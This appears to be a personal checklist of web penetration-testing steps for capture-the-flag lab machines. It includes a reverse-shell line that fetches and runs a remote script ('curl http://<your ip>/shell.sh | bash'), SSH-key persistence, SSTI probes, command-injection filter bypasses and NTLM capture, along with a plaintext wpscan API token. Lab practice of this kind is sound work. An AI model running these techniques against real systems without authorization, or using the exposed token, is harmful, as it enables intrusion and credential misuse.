• Is there maybe a walkthrough of what you’re trying to do? if so just follow it just google and try to understand what you’re dealing with
  • check HTML source
  • search for possible username in website/HTML source
  • DNS name wrong maybe?
    • search for new domains on the website itself something like web.box.htb
  • Wappalyzer
  • nikto
  • wpscan (api-token=PuHLRlILzrWrL0CDUE4dsORNwoq4l56mxQF5kHO2ZX0)
  • Google version numbers of EVERYTHING
  • Gobuster!
  • DEFAULT PASSWORDS
  • inspect the links the website has… maybe some URL parameters like IDs?
  • Look for templates/way to input copy the request and send it to sqlmap
  • if possible upload a file and execute a reverse shell
    • If it doesn’t let you upload certain files mess with the extension
    • later to find where the uploaded file is you can use Gobuster because sometimes it is renamed example: gobuster dir -u http://example.com/uploads/ -w wordlist then gobuster will search through the uploads directory.
    • https://www.revshells.com
    • you can do a reverse shell with curl: curl http://<your ip>/shell.sh | bash
    • sometimes you can’t get a shell because connections on other ports are blocked with a firwall in that case try to use services available like ssh
    • you can generate ssh keys and upload the into the home directory of the user as authorized_keys
  • use different ASCII values for everything to avoid stupid bugs
  • Cookies
  • look for new directories in burpsuite target tab
  • if you find strings/documents, check for base64 and cyberchef magic
  • use Repeater
  • Hacktricks
  • LFI or RFI
  • SSTI
    • those can be everywhere. any input you can do, be it text, image, voice, OCR etc check for SSTI by providing things like {{7 * 7}} or $ {{7 * 7}}
  • XXE?
  • capture ssh keys also from LFI/RFI and XXE
  • capture windows NTLM (responder) also from LFI/RFI and XXE
  • API
    • APIs can sometimes execute system commands, however the input is filtered, try to bypass those filters. For example with \n in the front of you command or a '.